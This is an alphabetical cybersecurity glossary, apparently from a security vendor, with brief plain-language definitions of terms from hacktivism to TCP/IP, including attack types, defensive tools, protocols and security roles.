Hacktivism
Hacktivism is the use of computer hacking techniques to promote or push ideological, political, or social agendas. Unlike traditional hacking, which often focuses on financial gain or curiosity, hacktivism is fueled by motivations such as resisting censorship, advancing human rights, combating surveillance, or advocating for social or environmental justice.
Handshake Protocol
A handshake protocol is a process that systems use to establish a secure connection before transmitting data. It ensures both parties in the communication verify their identities and agree on the rules for the interaction, such as encryption standards.
Hashing
Hashing is a one-way cryptographic function that converts any input (such as a file, password, or message) into a fixed-length string of characters known as the hash value, or digest. Whether the input is large or small, the output length remains consistent for any given hashing algorithm.
Health Insurance Portability and Accountability Act (HIPAA)
A US federal law established in 1996, HIPAA mandates the protection and confidential handling of people’s medical information.
Heap Spraying
Heap Spraying is a specialized cyberattack technique where an attacker floods a system's memory "heap" with malicious code to increase the chances of a successful exploit.
HIPAA - Health Insurance Portability and Accountability Act
HIPAA is a US federal law that establishes national standards for protecting sensitive patient health information from being disclosed without the patient's consent or knowledge.
Hoax Attack
A hoax attack is a fake warning about a virus, security threat, or cyber incident that spreads through email, social media, or other communication channels.
Honey Token
A honey token is bait for cybercriminals. Unlike honeypots (which simulate entire environments to attract attackers), honey tokens are single fake artifacts embedded within a system. These can be fake credentials, files, API keys, or even email addresses. Their purpose? If accessed or used, the honey token triggers an alert, instantly telling defenders there’s an intrusion.
Honeypots
Honeypots are cybersecurity mechanisms that gather intelligence on cybercriminals' identities, methods, and motivations. They use decoy targets to lure cybercriminals away from legitimate targets.
Hooking
Hooking is a software technique that intercepts interactions between programs or system components. It is useful for both enhancing program functionality and monitoring or manipulating behavior, sometimes with malicious intent.
Horizontal Port Scan
A horizontal port scan is when someone probes one specific port across multiple devices on a network. The goal? To find and exploit devices running vulnerable software or services on that port.
HTTP/2
HTTP/2 has revolutionized how we interact with the web, offering vastly improved speeds and performance over its predecessor, HTTP/1.1.
HTTP/3
HTTP/3, based on QUIC, is the third major version of the Hypertext Transfer Protocol (HTTP), which offers lightning-fast connections.
Human Identity
Human identity in cybersecurity refers to the unique digital characteristics, credentials, and attributes that verify and authenticate a real person's access to systems, applications, and data. It encompasses usernames, passwords, biometric data, and behavioral patterns that distinguish one individual from another in digital environments.
Human Risk Management
Human Risk Management (HRM) is a comprehensive approach to identifying, assessing, and reducing cybersecurity risks associated with human behavior within an organization. It emphasizes that people are both a company’s first line of defense and a potential vulnerability when it comes to cyber threats.
HUMINT
Human Intelligence (HUMINT) is all about collecting valuable information from humans rather than technical sensors or open sources. Think interviews, surveillance, chatting with insiders, or even posing undercover on dark web forums. It’s not just eavesdropping or running scripts; it’s digging into motivations, relationships, and even lies.
Hypervisor
A hypervisor, also known as a Virtual Machine Monitor (VMM), is software or firmware that enables the creation and management of virtual machines (VMs).
I
IaC Scanning
IaC scanning is the automated analysis of Infrastructure as Code (IaC) files to detect misconfigurations, vulnerabilities, and policy violations that could lead to security risks. It helps security teams catch and fix weak points in cloud and DevOps environments before deployment, reducing the risk of breaches, compliance failures, and downtime.
Identity and Access Management Specialist
Identity and access management (IAM) specialists ensure that only the right people have access to the right resources—at the right time.
Identity Segmentation
Identity segmentation is the process of separating and categorizing user identities in a network to improve security and reduce risk. This approach ensures that users only have access to what they need, limiting unnecessary exposure to sensitive data or systems.
IEEE 802.1 Standards
The IEEE 802.1 working group creates specifications that define how network devices should behave at the data link layer of the OSI model.
IIS Logs
IIS logs are text files that log every request made to a web server running Internet Information Services (IIS). They record who did what, when, and how on your site.
Incident Responder
An incident responder is a cybersecurity professional who detects, investigates, and manages the aftermath of cyber incidents to minimize damage and restore systems to operational status.
Incident Response
Incident response in cybersecurity refers to the strategies and procedures for responding to cyber threats and attacks in a network.
Indicator of Attack (IOA)
An Indicator of Attack (IOA) refers to behavioral patterns or activities that indicate a cyberattack is either underway or highly likely.
Information Security or InfoSec
InfoSec is the policies and procedures put in place by the organization to protect sensitive data from unauthorized access.
Infrastructure-as-a-Service (IaaS)
IaaS is a type of cloud computing where the provider offers the customer the ability to create virtual networks within a cloud-based computing environment.
Ingress Controller
An ingress controller is a Kubernetes (commonly referred to as K8s) component that manages external access to services within a cluster, acting as a traffic director that routes incoming requests to the right destinations.
Initial Access
Initial access refers to the adversary’s first successful entry point into a target network or system. It represents the critical foothold that enables attackers to establish a presence, often through tactics like phishing, exploiting vulnerabilities, or leveraging stolen credentials.
Initialization Vector
An initialization vector (IV) is a random or pseudorandom value used in encryption algorithms to ensure that identical plaintext inputs yield unique ciphertext outputs, even when encrypted with the same key.
Injection Attack
An injection attack is a type of cyberattack where a malicious actor inserts (or "injects") unauthorized code into a vulnerable computer program or system. This malicious code is then processed by the application, tricking it into executing unintended commands or accessing data without proper authorization.
Insider Threat
An insider threat is a cybersecurity risk that originates from within an organization, typically involving current or former employees, contractors, or business partners who have authorized access to company systems and data, but misuse that access either intentionally or unintentionally.
Integrations
In cybersecurity, integrations describe the capability of different computers and software systems to work together and exchange data.
Interactive Login
Interactive login is a user authentication method where someone directly communicates with a computer system through an interface—like typing a username and password on a login screen—to gain access to that system.
Intrusion Detection System (IDS)
An Intrusion Detection System (IDS) is a security tool that monitors network traffic or system activities for suspicious behavior and alerts administrators when potential threats are detected.
Intrusion Detection System (IDS)
An IDS is a security tool that detects the presence of cyber threats and notifies administrators. HIDS (host-based intrusion detection) and NIDS (network-based intrusion detection) are IDS variants used specifically for endpoints (hosts) or for the network, respectively.
IoT Cybersecurity
IoT cybersecurity is a field focused on defending everything from that smart lock on your front door to industrial robots and city traffic lights. It covers device protection, network security, data protection, and continuous monitoring.
IP (Internet Protocol) Address
A unique identifier for a device connected to the internet, represented as a string of numbers and characters.
IPS (Intrusion Prevention System)
An Intrusion Prevention System (IPS) is a form of network security that can identify malicious activity, collect information about that activity, report it, and attempt to block or stop it. An IPS works by actively scanning and analyzing network traffic for malicious activities and known attack patterns. Similar to an IDS, intrusion prevention systems are designed to warn of suspicious activity, but the key difference is that they can also take automated action and respond to active threats based on a predetermined set of rules.
IRSF
International Revenue Share Fraud (IRSF) involves threat actors exploiting telecom systems to artificially generate international call traffic toward premium-rate numbers. These premium numbers often belong to overseas carriers or shell entities owned by fraudsters.
ITDR
Identity Threat Detection and Response (ITDR) is a cybersecurity framework that helps protect user identities and systems from cyberattacks.
ITDR (Identity Threat Detection and Response)
A cybersecurity discipline that focuses on helping organizations and individuals protect their identity infrastructure and assist with remediation related to identity-centric attacks.
J
Just-in-time (JIT)
JIT refers to enabling specific privileges only when needed and disabling them when no longer required. This significantly reduces the window of vulnerability and minimizes the risk of unauthorized access or misuse of elevated privileges.
K
Kerberos
Kerberos is an authentication protocol that uses cryptography to verify the identity of users and hosts.
Keylogger
A keylogger is software that an attacker uses to remotely record keystrokes made on a physical keyboard and capture passwords or other critical information.
Keystroke Logging
Keystroke logging (or keylogging) is a method of tracking and recording every keystroke you make on a keyboard. Keyloggers can monitor anything you type, from passwords and emails to credit card numbers and private messages.
L
LaaS
LaaS (Logging as a Service) is a cloud-based solution that centralizes log management from applications, servers, and network devices, providing organizations with scalable monitoring and analysis capabilities without maintaining on-premises infrastructure.
LAN (Local Area Network)
A Local Area Network (LAN) is a network of connected devices within a limited geographic area, such as a home, office building, or school campus.
Lateral Movement
Lateral movement in cybersecurity refers to an attacker’s ability to move across a network after gaining initial access. Attackers use lateral movement to gain deeper access, steal valuable data, escalate privileges, or even set the stage for a massive ransomware attack.
Layer 7 Protocols
Layer 7 protocols enable applications to communicate over networks. When you type a URL into your browser, Layer 7 protocols like HTTP or HTTPS spring into action.
Least Privilege
Least privilege access is the principle of giving users the minimum access necessary to perform their job functions. It is a security measure that limits access to sensitive data to only the people who truly need it for their work.
Log Format
A log format is a structured way to organize log data so it’s both human-readable and machine-friendly.
Log Parsing
Log parsing means taking those big (often ugly) log files and splitting them into neat chunks of data. Imagine a log file as dozens of receipts tossed in a bag. Log parsing is what sorts them by date, item, store, and total, so you can find exactly what you need.
Log Retention
Log retention is the practice of storing and managing log files for a specified period to meet security, compliance, and operational requirements. It involves determining what logs to keep, how long to store them, and where to house this critical data.
Log Rotation
Log rotation is an automated process used to manage log file sizes by systematically renaming old files and creating new ones.
Log Streaming
Log streaming is the real-time process of continuously capturing and transmitting log data from applications and systems to external monitoring, analytics, or storage platforms for immediate analysis and alerting.
Long Term Evolution (LTE)
LTE, short for Long Term Evolution, is a fourth-generation (4G) wireless communication standard established by the 3rd Generation Partnership Project (3GPP).
LOTL
Living Off the Land (LOTL) attacks are a type of cyberattack where threat actors use legitimate, trusted tools and software already present on a target system to carry out malicious activities. Attackers exploit built-in system utilities, administrative tools, and legitimate applications to avoid detection and achieve their objectives.
Low-Code Platform Security
Low-code platform security is the practice of keeping your low-code apps safe from unauthorized access, data breaches, and configuration slip-ups, which includes securing development environments, sticking to pre-vetted components, using built-in security features, and double-checking that your configurations and access controls are correct.
M
Machine Learning (ML)
Machine learning lets computers learn from data and make decisions or predictions without being programmed to do so.
Magic Number
A magic number is a specific sequence of bytes, found at the beginning of a file, that acts as its unique fingerprint. These numbers help computers and software identify the type of file—even when it doesn’t have a file extension, or the extension has been tampered with.
Malspam
Malspam, short for "malicious spam," refers to unsolicited emails used to deliver malware through infected attachments or links to malicious websites.
Malspam
Malspam is a spam email that delivers malware, often through malicious attachments (like infected documents or executables) or links that, when clicked, download malware onto the recipient's device.
Malvertising
Malvertising is a cyberattack method where criminals inject malicious code into legitimate online advertisements to distribute malware or redirect users to dangerous websites.
Malware
Malware is malicious software designed to harm a computer, network, or server. Malware includes things like viruses, worms, Trojans, ransomware, spyware, or adware.
Malware Analysis
Malware analysis is the process of understanding the behavior and purpose of suspicious files or URLs to help detect and mitigate potential threats.
Malware Analyst
A malware analyst studies suspicious files and software to understand how malware works and how it can be stopped. Their insights help cybersecurity teams detect, investigate, and defend against cyberattacks.
Malware Packer
A malware packer is a tool that compresses, encrypts, or obfuscates malicious software to evade detection by antivirus programs and security tools. Think of it as digital camouflage that cybercriminals use to hide their malicious code from cybersecurity defenses.
Man-in-the-Middle (MitM) Attack
This type of cyberattack involves a threat actor putting themselves in the middle of two parties, normally a user and an application, to intercept their communications or data exchanges for malicious purposes.
Managed Detection and Response
Managed Detection and Response (MDR) has emerged as a critical service that combines advanced technology with human expertise to safeguard businesses against cyberattacks.
Managed Detection and Response (MDR)
A cybersecurity service combining technology and human expertise to perform threat hunting, monitoring, and response. MDR technology collects and analyzes information from logs, events, networks, endpoints and user behavior—which is then paired with a team of experts who can take over to validate incidents, escalate critical events and provide recommended response actions so threats can be quickly remediated. MDR services are managed or co-managed by an outside partner to provide value to organizations that either have limited resources or lack the expertise to keep eyes on all of their potential attack surfaces.
Managed IT Services
Managed IT services are services managed outside an organization by external vendors, where these service providers give businesses the expertise and resources to manage their IT infrastructure and operations. This can include tasks like network management, cybersecurity, data backup and recovery, and software updates, freeing up internal IT staff to focus on strategic initiatives.
Managed Security Service Providers (MSSP)
Managed Security Service Providers (MSSP) are third-party organizations providing outsourced security services.
Mean Time to Respond (MTTR)
Mean Time to Respond (MTTR) is the average time it takes a security team to respond to and resolve a cybersecurity incident from the moment they receive notification.
Media Servers
A media server is a dedicated computer system or software application that stores, processes, and delivers multimedia content such as videos, audio, and images to other devices across a network. Simply put, a media server acts as the central library and distribution point for digital media within organizations or homes.
Mimikatz
Mimikatz is a tool designed to extract sensitive authentication credentials from Windows systems’ memory. Developed by Benjamin Delpy, it started as a proof-of-concept to demonstrate vulnerabilities in Microsoft's authentication protocols but quickly became an indispensable utility in the cybersecurity world.
Mobile Device Management (MDM)
Mobile Device Management (MDM) is cybersecurity software that helps organizations secure, monitor, and manage employees' mobile devices—like smartphones, tablets, and laptops—that connect to company networks.
Multi-Factor Authentication (MFA)
An authentication method that requires users to provide two or more verification factors before granting access or signing in. These factors can include something only the user would know (e.g., password/PIN), something only the user would have (e.g., token) or something only the user is (e.g., biometric). MFA then uses these factors to confirm the identity of someone who is requesting access to an application, website or another resource. MFA is a key factor in account takeover defense.
Multihoming
Multihoming is a network configuration where a device or network connects to multiple internet service providers (ISPs) or networks simultaneously.
N
NAT Rules
NAT rules are configuration settings that define how Network Address Translation (NAT) should modify IP addresses as network traffic passes through a firewall or router.
National Institute of Standards and Technology (NIST)
NIST is a US agency advancing measurement science, standards, and technology to enhance economic security.
Network Control
Endpoint firewalls that enable total control over network traffic using dynamic ACLs.
Network Detection and Response (NDR)
An integrated network security solution designed to detect threats and suspicious behavior on an organization's networks using non-signature-based techniques (such as machine learning and other analytical techniques). NDR solutions track north/south network traffic that crosses the perimeter, as well as east/west lateral traffic to establish a baseline of normal behavior and raise alerts when anomalous behavior is detected. NDR solutions give security teams real-time visibility and awareness over network traffic and the ability to respond to perceived threats.
Network Redirector
A network redirector is software that helps your computer access files, printers, and other resources on remote network systems. It acts as a bridge between your local device and shared resources on other machines across a network.
Network Security Engineer
Network security engineers design, implement, and maintain the security infrastructure that protects organizational networks from cyber threats.
Network Segmentation
Network segmentation is the practice of dividing a computer network into separate segments or zones to limit access to sensitive data and reduce attack risks.
Next-Generation Antivirus (NGAV)
Next-Generation Antivirus (NGAV) is an expanded version of antivirus that goes beyond performing signature-based detection—typically by incorporating some type of advanced technology—to prevent a wider range of attacks. Unlike traditional AV, next-generation AV focuses on events (files, processes, applications, network connections, etc.) to help identify malicious intent or activity. NGAV has emerged in recent years to address the proliferation of new types of malware and viruses that can easily bypass traditional AV.
NFS
NFS (Network File System) is a distributed file sharing protocol that allows computers to access files and directories on remote servers as if they were stored locally. Originally developed by Sun Microsystems in 1984, NFS enables seamless file sharing across networks, making it a fundamental technology in modern IT environments.
NGFW IPS
NGFW IPS combines the features of a Next-Generation Firewall (NGFW) and an Intrusion Prevention System (IPS) to enhance cybersecurity. It blocks unauthorized access, monitors network traffic, and actively prevents attacks in real time. This integrated approach allows organizations to protect their networks more effectively by merging robust firewall capabilities with advanced threat detection. NGFW IPS adapts to new and evolving cyber threats, safeguarding businesses from malware, ransomware, and zero-day vulnerabilities.
NTLM
NTLM (New Technology LAN Manager), developed by Microsoft, is a suite of security protocols designed to authenticate users on networks running Windows operating systems.
O
Object Linking and Embedding (OLE)
Object Linking and Embedding (OLE) is a Microsoft technology that simplifies how programs work together. At its core, OLE enables the integration of content like text, images, charts, and even spreadsheets from different applications into a single document.
Observability
Observability refers to the ability to infer the internal state of a system by examining its external outputs, like metrics, logs, and traces.
On-Prem
On-premises is a physical infrastructure setup deployed, running, and maintained within the confines of an organization, typically in a datacenter or COLO (colocation facility).
One-Time Password
A one-time password (OTP) is a temporary code, randomly generated by an algorithm, that you use only once, making it nearly impossible for hackers to guess or reuse later.
Open Banking
Open banking lets you securely share your financial data with approved third-party apps and services.
OpenID Connect
OpenID Connect (OIDC) is an identity layer built on top of the OAuth 2.0 protocol that allows users to use an existing account from an identity provider to sign into various web applications securely.
Open Source Intelligence (OSINT)
OSINT refers to the gathering and analysis of publicly available data for intelligence purposes.
OpenSSL
OpenSSL is a free, open-source toolkit that provides encryption for securing communications across computer networks.
Open Web Application Security Project (OWASP)
OWASP is an internet community focused on understanding web technologies and how they are exploited; it is best known for the OWASP Top 10.
Over-the-Air Technology
Over-the-air (OTA) technology refers to the wireless delivery of software updates, configurations, and data to connected devices without requiring physical access or manual intervention. This technology enables remote updates to everything from smartphones to smart cars, using cellular, Wi-Fi, or other wireless networks.
P
Packet Capture (PCAP)
PCAP is the practice of intercepting data packets traveling over a network so that a security team can store and analyze them.
Parser
A parser is a program that takes input data, often text, and transforms it into a structured format that a computer can understand and process. This transformation involves analyzing the input to determine its grammatical structure, a process known as parsing.
Password Management Tool
A password management tool is software that stores and protects confidential information like usernames and passwords for local applications and online services. A password manager will house a user’s passwords, as well as other information, in one convenient location with one master password. The information is encrypted and often requires multi-factor authentication to access.
Password Security Storage
Password security storage refers to the methods and technologies used to safely store user passwords in databases and systems, ensuring they remain protected even if the storage system is compromised.
Password Spraying
Password spraying is a type of brute force cyberattack where hackers use a few common passwords against many user accounts, rather than trying multiple passwords on a single account. This "low and slow" approach helps attackers avoid detection systems that typically lock accounts after multiple failed login attempts.
Passwordless Security
Passwordless security is exactly what it sounds like—a way to authenticate users without requiring them to enter a traditional password. Instead of typing in "Password123!" (please tell me you're not actually using that), users verify their identity through something they have (like their phone), something they are (like their fingerprint), or something they know that's not a static password.
Payment Card Industry Data Security Standard (PCI-DSS)
The Payment Card Industry Data Security Standard (PCI DSS) is a globally recognized set of security protocols that protect credit card transactions from theft and fraud. It was established in 2004 and is maintained by the Payment Card Industry Security Standards Council (PCI SSC), which includes major financial brands like Visa, Mastercard, and American Express.
Penetration Testing (Pen Test)
A penetration test is a security exercise where a security expert tries to find and exploit vulnerabilities in a computer system. Pen tests are different from vulnerability scans in that they involve an actual attempt to exploit vulnerabilities, while vulnerability scans simply report on possible vulnerable code, applications, configurations, or operating systems.
Persistence
Persistence is what lets malware keep running on a system over time, all while the attacker stays undetected.
Persistent Foothold
A persistent foothold is an attacker mechanism to automatically re-trigger some malware (maybe a stub or even fully loaded malware) across potential interruptions like restarts or user logoffs.
Personally Identifiable Information (PII)
Personally identifiable information (PII) refers to any data that can directly or indirectly identify an individual.
Phishing
Malicious attempts to trick users into revealing sensitive information through deceptive emails or links.
Physical Security Tester
A physical security tester evaluates an organization's physical defenses by attempting to gain unauthorized access to buildings, facilities, and restricted areas. They identify vulnerabilities in locks, access controls, surveillance systems, and security procedures to help organizations strengthen their overall security posture.
Platform-as-a-Service (PaaS)
Platform-as-a-Service (PaaS) is a complete cloud environment that includes everything developers need to build, run and manage applications.
Polymorphic Virus
A polymorphic virus is malware that modifies its code or appearance with each infection, while its harmful functionality remains the same. These changes make traditional, signature-based antivirus tools ineffective, as each new variant looks unique.
Post Office Protocol
Post Office Protocol (POP) is a standard way for your email client (like Outlook or Thunderbird) to retrieve emails from a remote server to your computer. Most people are talking about POP3, the current version, which is still widely used today.
Potentially Unwanted Application
A Potentially Unwanted Application (PUA) is software that may not be malicious but can cause problems like slowing down your computer, displaying excessive ads, or collecting personal data without your consent. While not always outright dangerous, PUAs often come bundled with other downloads or sneak onto systems unnoticed.
Principle of The Least Privilege (POLP)
The principle of least privilege is a cybersecurity approach that gives users, programs, and even devices only the access they absolutely need to do their job or function. No more, no less.
Privilege Escalation
Privilege escalation refers to the act of gaining higher-level permissions or access rights within a system, often beyond what is legitimately authorized for a user or process.
Proxy
A system or router that acts as a middleman between a user and the internet.
Punycode
Punycode is a special encoding system that converts Unicode characters (used in scripts like Chinese, Cyrillic, and Arabic) into ASCII format so they can be processed by DNS.
Purple Team
The purple team marries the strengths of red and blue teams into a collaborative force built for modern cyber defense.
Q
Quantum Computing
Very different from classical computing, quantum computing refers to advanced computing using quantum-mechanical phenomena.
Quantum Cryptography
Quantum cryptography is an advanced cybersecurity technique that uses the principles of quantum mechanics to secure data and communications.
R
Race condition
A race condition occurs when the outcome of a program or process depends on the timing or sequence of multiple threads or processes that are accessing and modifying shared resources. This lack of proper synchronization creates unpredictable behavior, which can lead to security vulnerabilities, data inconsistencies, and system instability.
Rainbow Table
A rainbow table is a large, precomputed database that maps plaintext passwords to their hash values. They store chains of possible passwords and their hashes, giving attackers a shortcut to cracking hashes without the computational cost of guessing each password interactively.
RAM Scraper
A RAM scraper, or Random Access Memory scraper, is a type of malware designed to steal payment card data from a computer's memory before it gets encrypted. These tools are often used by cybercriminals to target point-of-sale (POS) systems, particularly in retail and hospitality settings.
Ransomware
Ransomware is malicious software that encrypts data and demands payment, usually in the form of cryptocurrency, for its release.
Ransomware Recovery
Ransomware recovery is the coordinated effort to restore and secure your systems after a ransomware attack. It begins with figuring out how far the ransomware has spread, where it came from, and what damage has been done. Once your team understands the full scope, you have to completely remove the ransomware itself. This usually involves deploying security tools to isolate and eliminate the malicious software from all affected devices and networks.
Recovery Point Objective
Recovery Point Objective (RPO) is the maximum amount of data an organization can afford to lose during an outage, measured in time. It helps determine how often backups need to be done to minimize data loss.
Recovery Time Objective
Recovery Time Objective (RTO) refers to the maximum acceptable amount of time that a digital system, application, or service can remain unavailable following a disruption. Measured in seconds, minutes, hours, or days, RTO represents the critical window in which operations must be restored to minimize losses and maintain business continuity.
Red Team
A red team is a group of internal or external IT experts who simulate the actions of adversarial malicious attacks on a network as an exercise.
Remote Access
As the name implies, remote access refers to accessing network resources from a geographical distance through a network connection.
Remote Administration Tools
Remote administration tools (RATs) are software solutions that allow users to connect to and control computers or networks remotely.
Remote Code Execution (RCE)
Remote code execution (RCE) is a security flaw that allows threat actors to run commands or code on a target computer remotely.
Repacking
Repacking in cybersecurity refers to the malicious practice of modifying legitimate mobile applications by inserting harmful code, then redistributing these tampered apps to unsuspecting users.
Reverse Engineer
Reverse engineering is like solving a digital puzzle, where each piece of software holds secrets waiting to be unraveled. For cybersecurity professionals, reverse engineering is a powerful tool for understanding software vulnerabilities, analyzing malware, and fortifying digital defenses.
RFC
An RFC, or "Request for Comments," is a type of technical document published by folks who help set the rules of the internet, mainly the Internet Engineering Task Force (IETF).
Risk and Compliance Specialist
A Risk and Compliance Specialist plays a vital role in helping businesses identify, manage, and minimize risks while ensuring they adhere to laws, regulations, and industry standards. These professionals protect organizations against legal issues, financial losses, and reputational damage by developing and implementing compliance programs and risk mitigation strategies.
Rogue Access Point
A rogue access point (rogue AP) is any wireless access device, like a Wi-Fi router or hotspot, that connects to an organization’s network without permission from IT or a network security administrator.
Rogue Apps
Rogue Apps is a new Managed ITDR capability that enables Huntress to identify unsafe applications installed in a protected tenant. Rogue Apps represents Managed ITDR’s next step in wrecking hacker identity tradecraft. With this new capability, Huntress detects “Traitorware,” which are legitimate apps used badly that we detect by name, and “Stealthware,” which refers specifically to unknown apps that our algorithm marks as suspicious.
Rootkit
A rootkit is a type of malware that gives attackers hidden control over a computer system, allowing unauthorized access while staying concealed, making it one of the trickiest cyber threats to detect and remove.
S
Same-Origin Policy (SOP)
Same-Origin Policy (SOP) is a fundamental web security mechanism that prevents a script loaded from one origin from interacting with resources from a different origin to protect user data.
Sandboxing
Sandboxing is a cybersecurity technique used to test, observe, and analyze potentially harmful files or programs in a safe, isolated environment.
SASE (Secure Access Service Edge)
SASE (Secure Access Service Edge) is a modern networking architecture that converges software-defined networking with comprehensive security functions into a single, cloud-native service.
Scam
A scam is a deceptive scheme or trick intended to cheat someone out of money, sensitive information, or valuable property.
Scareware
Scareware is a form of malware that uses fear to deceive users into making harmful decisions. It typically masquerades as fake antivirus software or system alerts, claiming that your device is under immediate threat to pressure you into purchasing bogus software, clicking on harmful links, or downloading actual malware.
Script Kiddie
A script kiddie is someone who uses pre-made tools or scripts (created by others) to run cyberattacks.
Security Analyst
A security analyst is a cybersecurity professional focused on identifying, preventing, and responding to cyber threats. They safeguard systems, networks, and sensitive organizational data by employing a mix of monitoring tools, policies, and incident response techniques.
Security by Obscurity
Security by Obscurity is a controversial security practice that relies on keeping the inner workings, flaws, or implementation details of a system hidden as the primary means of protection.
Security Data Lake
A security data lake is a centralized repository designed to ingest, store, and analyze massive amounts of security data from diverse sources within an organization.
Security dependencies
Security dependencies are the links or relationships between components, processes, and entities within your company’s cybersecurity ecosystem.
Security Director
A security director oversees all security operations within an organization, managing both physical and cybersecurity measures to protect people, assets, and data. They develop security policies, lead security teams, and serve as strategic advisors to executive leadership on risk management and threat mitigation.
Security Email
A security email is a message designed or processed to protect its content, the email sender, and the recipient from cyber threats such as phishing, malware, or unauthorized access.
Security issues
Security issues are potential vulnerabilities or weaknesses in systems, networks, or processes that cybercriminals can exploit to gain unauthorized access, steal data, or disrupt operations. These issues represent gaps in an organization's defense that, if left unaddressed, can lead to devastating consequences.
Security Misconfiguration
A security misconfiguration is a vulnerability that happens when the settings on your applications, systems, or cloud services aren’t properly secured, creating gaps that attackers can exploit.
Security Operations Center (SOC)
A centralized unit that deals with security issues on an organizational and technical level. SOCs are typically staffed with a team of domain experts (either in-house or outsourced) who focus on preventing, detecting, analyzing and responding to cybersecurity incidents. A SOC acts as a central command post that continuously monitors an organization’s environments and toolsets and improves its security posture.
Security Operations Report
A security operations report is a document that provides detailed insights into an organization’s security posture, ongoing threats, and the effectiveness of its defenses. Crafted by a Security Operations Center (SOC) team, it serves as a comprehensive log of cybersecurity activities and outcomes, offering both a current and historical view of an organization’s digital safety.
Security Orchestration
Security Orchestration is the process of bringing your security tools, teams, and workflows together so they work in sync, all to boost your defenses and knock out threats faster.
Security Orchestration, Automation and Response (SOAR)
A collection of software solutions and tools that aggregate security intelligence and context from disparate systems, and applies machine intelligence to streamline (or even completely automate) the threat detection and response process. SOAR combines three software capabilities: the management of threats and vulnerabilities (orchestration), automating security operations (automation) and responding to security incidents (response). Due to its aggregation and automation capabilities, SOAR solutions are often used by security operation centers (SOCs) to collect threat-related data from a range of sources and automate the responses to certain threats.
Security Posture
Security Posture is the overall strength and readiness of an organization's collective cybersecurity defenses, including its technical controls, policies, and incident response capabilities.
Security Proof Of Concept
Cybersecurity threats often start with a proof of concept (PoC) before spiraling into something much worse. For most organizations and MSPs (managed service providers), knowing what a PoC is and how it works can give you a critical edge in staying protected. Because trust us, the gap between a PoC and a full-blown attack? It’s way smaller than you want it to be.
Service-oriented architecture, or SOA
At its core, SOA is a modular design framework used to enable services to communicate over a network. It organizes software into loosely coupled, reusable components (think services like "payment processing" or "user authentication") that can be deployed and accessed independently.
Session
A session is a time-limited conversation between two or more devices over the internet.
Session Hijacking
Session hijacking is an attack where a threat actor manipulates a session token to gain unauthorized access to information.
SID in Computer Systems
A typical SID looks like this: S-1-5-21-3632462615-3141105534-30830830-1115. Let's break down what each part means: S: Indicates this is a Security Identifier. 1: The revision level (current version is 1). 5: The identifier authority (5 = NT Authority). 21: Sub-authority indicating the domain identifier size. 3632462615-3141105534-30830830: The domain or local computer identifier. 1115: The Relative Identifier (RID) that pinpoints the specific user or group. Windows uses these components to ensure each SID is globally unique and can never be duplicated.
SIEM
SIEM stands for security information and event management. SIEM is a software solution that aggregates and analyzes activity from many different sources across an entire IT infrastructure. A SIEM gathers immense amounts of data from an entire networked environment, then consolidates it and makes that data human accessible. With the data categorized and laid out, SIEM solutions are often used by security operation centers (SOCs) to streamline visibility across an environment, centralize data for security monitoring, and investigate logs and events for incident response.
Single Factor Authentication
Single-Factor Authentication (SFA) is a basic security process that requires only one category of credential—typically a password or PIN—to verify a user's identity, making it more vulnerable to compromise than multi-factor methods.
SIP Gateway
A SIP Gateway is a technology that connects traditional telephony systems, like analog phones, with modern Voice over Internet Protocol (VoIP) networks. This allows organizations to integrate older equipment with internet-based communication services seamlessly.
SIP Proxy
A SIP proxy is a server that routes Session Initiation Protocol (SIP) messages between devices to establish, manage, and terminate communication sessions, such as voice calls, video conferences, and messaging, over IP networks.
Skimmer
A skimmer is a small device that criminals attach to legitimate card readers. It’s designed to record information from the magnetic stripe of your credit or debit card when you use it to pay or withdraw cash.
Smishing
Smishing, short for SMS phishing, is a type of cyberattack where threat actors trick you into giving up personal information or downloading malware through text messages.
SNMP (Simple Network Management Protocol)
SNMP (Simple Network Management Protocol) is a standard protocol used for monitoring and managing devices on an IP network, though it requires careful configuration to avoid being exploited by attackers.
Snort Rules
Snort rules are written instructions that tell the Snort Intrusion Detection System (IDS) what network activity to watch for and how to respond. These rules help detect suspicious or malicious traffic moving through your network, from malware downloads to port scans.
SOAP
SOAP (Simple Object Access Protocol) is a messaging protocol that enables different systems to communicate securely over a network, especially the internet. It’s often used for sending and receiving data between applications, regardless of the technology or programming language they use.
SOC Analyst
A SOC analyst is a cybersecurity professional embedded within a SOC. They’re responsible for monitoring, detecting, and responding to potential threats within networks.
Software Security
Software security means designing, developing, and maintaining software so that it resists attacks or accidental failures. Its main goal is to keep software safe from being misused, altered, or broken—even when hackers or mistakes try to take it down.
Software-as-a-Service (SaaS)
SaaS is a software licensing model which allows access to software on a subscription basis using external servers.
SPAN
A switched port analyzer (SPAN) is a dedicated port on a switch that sends a mirrored copy of network traffic from within the core switch or firewall to a destination. People use it to review network traffic using software like Wireshark.
Spear Phishing
Spear phishing is a targeted phishing attack using researched information to deceive specific individuals.
SQL Injection (SQLi)
A cyberattack that injects malicious SQL code into an application to view or modify a database.
SSH
SSH, or Secure Shell, is a cryptographic protocol enabling secure communication between two systems over an unsecured network.
SSL
SSL (Secure Sockets Layer) is an encryption-based security protocol designed to protect internet communications by ensuring that data shared between a user and a website is scrambled into an unreadable format.
SSL Termination
SSL termination is the process of decrypting encrypted traffic at a network endpoint—like a load balancer or reverse proxy—before passing it to web servers.
SSL VPN
An SSL VPN (Secure Sockets Layer Virtual Private Network) is a type of VPN that allows users to access a network securely through a web browser. It encrypts data, ensuring safe communication between the user and the network.
Stack Trace
A stack trace is a detailed report that shows the sequence of function or method calls a program made leading up to an error or crash. This information helps pinpoint exactly where things went wrong in the code.
Stealthware
Unknown and rare applications with broad permissions that provide attackers with a backdoor into the tenant environment. These globally unique, single, or multi-tenanted malicious applications often fly under the radar of traditional security tools and can be leveraged for persistent access, phishing campaigns, and data theft.
Steganography
Steganography is the practice of concealing information within another file, message, or medium that appears normal. This technique ensures that the hidden information's very existence is kept secret.
Structured Logging
Structured logging records data in a standardized, machine-readable format, with key-value pairs or JSON (JavaScript Object Notation) being the most common setup.
Suricata
Suricata is an open source detection engine that acts as an IDS (Intrusion Detection System).
Symmetric Encryption Algorithms
Symmetric encryption algorithms are cryptographic methods that use a single shared key for both the encryption and decryption of data, offering high speed for processing large volumes of information.
Syslog
Syslog is a simple protocol that computer systems use to send event data logs to a central location for storage.
System Development
System development follows a structured lifecycle with distinct phases from planning to maintenance. Security considerations must be integrated at every stage to prevent vulnerabilities. The process involves multiple stakeholders including developers, security teams, and end users. Different methodologies exist, but all emphasize planning, testing, and documentation. Proper system development reduces cybersecurity risks and ensures compliance with regulations.
T
TCP/IP
